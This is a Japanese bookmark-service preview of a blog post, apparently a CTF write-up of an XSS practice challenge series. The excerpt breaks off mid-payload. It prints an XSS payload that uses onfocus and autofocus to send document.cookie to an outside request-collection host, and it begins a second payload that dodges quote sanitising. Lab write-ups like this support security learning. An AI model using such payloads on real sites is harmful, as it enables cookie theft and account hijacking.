サクサク読めて、アプリ限定の機能も多数!
トップへ戻る
中東情勢
sec-rookie.hatenablog.com
初めまして、ななふんです。 8月27日に開催されたkatagaitai CTF勉強会 #9に参加しました。 WebパートであるXSS千本ノックのWriteupを復習がてら書いていきます。 XSS千本ノックのWriteupは他の方も書かれてますが、方法に若干の違いがあるようなので記載しました。 Stage12まで解けましたが1~4はメモしてなかったので省いてます。 5 onfocusとautofocusでテキストボックスに自動でフォーカスが当たるようにしてます。 ?q=XSS%22%20onfocus=%22location.href=%27https://requestb.in/rky1i4rk?cookie=%27%2bdocument.cookie%22%20autofocus=%22 6 ダブルクォートがサニタイジングされるので`(バッククォート)で代用 ?q=XSS%27%20on
このページを最初にブックマークしてみませんか?
『sec-rookie.hatenablog.com』の新着エントリーを見る
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く